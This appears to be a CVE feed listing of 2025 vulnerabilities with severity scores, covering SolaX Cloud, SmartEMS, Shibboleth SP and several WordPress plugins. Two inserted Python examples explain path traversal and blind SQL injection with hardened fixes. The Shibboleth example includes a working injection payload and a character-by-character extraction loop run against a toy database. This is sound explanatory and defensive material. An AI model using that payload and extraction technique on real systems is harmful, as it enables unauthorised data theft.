5.8
CVE-2025-36756 - Device Takeover vulnerability in SolaX Cloud
A missing authorization flaw in the SolaX Cloud platform allows an attacker to take over any SolaX solar panel inverter whose serial number is known.
8.8
CVE-2025-41714 - Path Traversal via 'Upload-Key' in SmartEMS Upload Handling
The upload endpoint insufficiently validates the 'Upload-Key' request header. By supplying path traversal sequences, an authenticated attacker can cause the server to create upload-related artifacts outside the intended storage location. In certain configurations this enables arbitrary file write a…
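The entry above describes a header-derived value being used as a path component. The following is an added example, not SmartEMS code: a hypothetical handler that joins the raw 'Upload-Key' onto the storage root beside a hardened one that allow-lists the key and then checks containment of the normalised path. The root directory, the ".part" suffix and all function names are assumptions made for the illustration.

```python
import posixpath
import re

# Added illustration for CVE-2025-41714, not SmartEMS code. The root
# directory, the ".part" suffix and the names below are assumptions.
UPLOAD_ROOT = "/var/smartems/uploads"
KEY_PATTERN = re.compile(r"[A-Za-z0-9_-]{1,64}")


def artifact_path_vulnerable(upload_key):
    """Hypothetical vulnerable handler: the raw header value names the
    artifact, so '../' sequences walk out of UPLOAD_ROOT."""
    return posixpath.join(UPLOAD_ROOT, upload_key + ".part")


def escapes_root(path, root=UPLOAD_ROOT):
    """True if `path`, once normalised, is not strictly inside `root`.
    commonpath() is used rather than startswith() so that a sibling such as
    '/var/smartems/uploads-old' is not mistaken for the root."""
    norm = posixpath.normpath(path)
    return norm == root or posixpath.commonpath([root, norm]) != root


def artifact_path_safe(upload_key):
    """Hardened handler. First an allow-list on the header (an upload key is
    an opaque identifier, so anything outside [A-Za-z0-9_-] is illegitimate,
    which also disposes of encoded separators and NUL bytes), then a
    containment check on the resulting path as defence in depth."""
    if not KEY_PATTERN.fullmatch(upload_key):
        raise ValueError("invalid Upload-Key")
    candidate = posixpath.join(UPLOAD_ROOT, upload_key + ".part")
    if escapes_root(candidate):
        raise ValueError("Upload-Key escapes the storage root")
    return posixpath.normpath(candidate)


if __name__ == "__main__":
    # Constructed header values: one legitimate key, three traversal attempts.
    for key in ("job-17", "../../../tmp/escaped", "/tmp/escaped", "a/../../b"):
        vuln = artifact_path_vulnerable(key)
        print(f"{key!r:24} vulnerable -> {posixpath.normpath(vuln)}"
              f"  (escapes root: {escapes_root(vuln)})")
        try:
            print(f"{'':24} safe       -> {artifact_path_safe(key)}")
        except ValueError as err:
            print(f"{'':24} safe       -> rejected: {err}")
```

Note that posixpath.join discards the root entirely when the second component is absolute, so a key beginning with '/' is as dangerous as one containing '../'; the allow-list stops both before any path arithmetic happens.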
9.1
CVE-2025-9943 - Unauthenticated SQL Injection Vulnerability in Shibboleth Service Provider
An SQL injection vulnerability has been identified in the "ID" attribute of the SAML response when the replay cache of the Shibboleth Service Provider (SP) is configured to use an SQL database as storage service. An unauthenticated attacker can exploit this issue via blind SQL injection, allowing f…
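The entry above turns on a detail worth seeing concretely: a replay cache answers only "seen before or not", yet that single bit is enough for blind extraction when the message ID is concatenated into the lookup. The following is an added example, not Shibboleth code: a toy SQL-backed replay cache with the lookup done by string formatting, the same cache with bound parameters, and an attacker loop that recovers a value from another table using nothing but accept/reject. Table names, the secret value and all function names are constructed for the illustration.

```python
import sqlite3

# Added illustration of the bug class in CVE-2025-9943, not Shibboleth code.
# A replay cache records the IDs of SAML messages it has accepted so that a
# captured message cannot be presented twice. When that cache is an SQL
# table and the ID is spliced into the query, the accept/reject decision
# becomes a boolean oracle that an unauthenticated sender can drive.


def make_cache():
    """Constructed in-memory stand-in for an SQL-backed replay store."""
    conn = sqlite3.connect(":memory:")
    # No uniqueness constraint on id: injected inserts in this toy store
    # whatever the injected expression evaluates to, and duplicates are harmless.
    conn.execute("CREATE TABLE replay (id TEXT, expires INTEGER)")
    # Some other table the SP's database account can read (constructed).
    conn.execute("CREATE TABLE secret (value TEXT)")
    conn.execute("INSERT INTO secret VALUES ('s3cret')")
    # One legitimate message already recorded from earlier traffic.
    conn.execute("INSERT INTO replay VALUES ('_earlier_response', 0)")
    conn.commit()
    return conn


def check_replay_vulnerable(conn, response_id):
    """Hypothetical vulnerable check: the ID taken from the SAML message is
    concatenated into SQL. Returns 'rejected' if the ID was seen before."""
    seen = conn.execute(
        f"SELECT 1 FROM replay WHERE id = '{response_id}'").fetchone()
    if seen:
        return "rejected"
    conn.execute(
        f"INSERT INTO replay (id, expires) VALUES ('{response_id}', 0)")
    conn.commit()
    return "accepted"


def check_replay_safe(conn, response_id):
    """Hardened form: the ID only ever travels as a bound parameter."""
    seen = conn.execute(
        "SELECT 1 FROM replay WHERE id = ?", (response_id,)).fetchone()
    if seen:
        return "rejected"
    conn.execute(
        "INSERT INTO replay (id, expires) VALUES (?, 0)", (response_id,))
    conn.commit()
    return "accepted"


def oracle(conn, condition, check=check_replay_vulnerable):
    """Ask the server one yes/no question about its database.

    The payload closes the string literal, ORs in a scalar subquery that
    evaluates `condition`, then reopens a literal so the statement stays
    syntactically valid. If the condition holds, every row of the replay
    table matches and the message is rejected as a replay; that rejection
    is the only signal the attacker needs.
    """
    payload = f"x' OR (SELECT {condition} FROM secret) OR 'a'='b"
    return check(conn, payload) == "rejected"


def extract_secret(conn, check=check_replay_vulnerable):
    """Recover secret.value one character at a time by binary search over
    unicode(), using nothing but the accept/reject oracle."""
    length = next(n for n in range(1, 64)
                  if oracle(conn, f"length(value) = {n}", check))
    out = ""
    for pos in range(1, length + 1):
        lo, hi = 31, 126          # invariant: lo < code point <= hi
        while hi - lo > 1:
            mid = (lo + hi) // 2
            if oracle(conn, f"unicode(substr(value, {pos}, 1)) > {mid}", check):
                lo = mid
            else:
                hi = mid
        out += chr(hi)
    return out


if __name__ == "__main__":
    cache = make_cache()
    print(check_replay_vulnerable(cache, "_id42"))          # accepted
    print(check_replay_vulnerable(cache, "_id42"))          # rejected (a real replay)
    print(extract_secret(make_cache()))                      # s3cret
    print(oracle(make_cache(), "1 = 1", check_replay_safe))  # False: payload is inert
```

Against the parameterised cache the same payload is stored as a literal string: the first presentation is accepted, a second identical one is rejected, and no condition ever changes the answer, which is exactly the behaviour a replay cache should have.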
4.9
CVE-2025-10142 - PagBank / PagSeguro Connect para WooCommerce <= 4.44.3 - Authenticated (Shop Manager+) SQL Injection
The PagBank / PagSeguro Connect para WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'status' parameter in all versions up to, and including, 4.44.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. Thi…
6.4
CVE-2025-9857 - Heateor Login – Social Login Plugin <= 1.1.9 - Authenticated (Contributor+) Stored Cross-Site Scrip…
The Heateor Login – Social Login Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'Heateor_Facebook_Login' shortcode in all versions up to, and including, 1.1.9 due to insufficient input sanitization and output escaping on user supplied attributes. This make…
6.4
CVE-2025-10126 - MyBrain Utilities <= 1.0.8 - Authenticated (Contributor+) Stored Cross-Site Scripting
The MyBrain Utilities plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'mbumap' shortcode in all versions up to, and including, 1.0.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated a…
7.2
CVE-2025-10001 - Import any XML, CSV or Excel File to WordPress <= 3.9.3 - Authenticated (Admin+) Limited Unsafe Fil…
The Import any XML, CSV or Excel File to WordPress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the import functionality in all versions up to, and including, 3.9.3. This makes it possible for authenticated attackers, with Administrator-level a…
4.3
CVE-2025-9888 - Maspik <= 2.5.6 - Cross-Site Request Forgery
The Maspik – Ultimate Spam Protection plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.5.6. This is due to missing or incorrect nonce validation on the clear_log function. This makes it possible for unauthenticated attackers to clear all spam …
4.3
CVE-2025-9622 - WP Blast | SEO & Performance Booster <= 1.8.6 - Cross-Site Request Forgery to Cache Clearing
The WP Blast | SEO & Performance Booster plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.8.6. This is due to missing or incorrect nonce validation on multiple administrative actions in the Settings class. This makes it possible for unauthenti…
7.7
CVE-2025-10040 - WP Import – Ultimate CSV XML Importer for WordPress <= 7.27 - Missing Authorization to Authenticate…
The WP Import – Ultimate CSV XML Importer for WordPress plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'get_ftp_details' AJAX action in all versions up to, and including, 7.27. This makes it possible for authenticated attackers, with Subsc…